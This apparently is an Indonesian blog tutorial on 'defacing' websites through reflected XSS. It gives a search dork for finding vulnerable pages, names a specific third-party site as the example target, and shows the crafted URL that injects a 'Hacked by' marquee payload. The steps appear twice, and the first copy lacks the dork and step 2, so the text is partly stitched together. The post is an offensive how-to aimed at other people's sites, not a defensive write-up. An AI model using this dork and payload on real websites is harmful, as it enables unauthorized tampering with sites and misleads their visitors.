Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :


Contoh : saya pakai web ini http://2muchvector.com/showcatrows.php?CategoryID=41
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://2muchvector.com/showcatrows.php?CategoryID=41"><marquee><h1>Hacked by kediricyberarmy.blogspot.com</h1></marquee>
4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.
1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://2muchvector.com/showcatrows.php?CategoryID=41
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://2muchvector.com/showcatrows.php?CategoryID=41"><marquee><h1>Hacked by kediricyberarmy.blogspot.com</h1></marquee>
4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.
0 komentar:
Post a Comment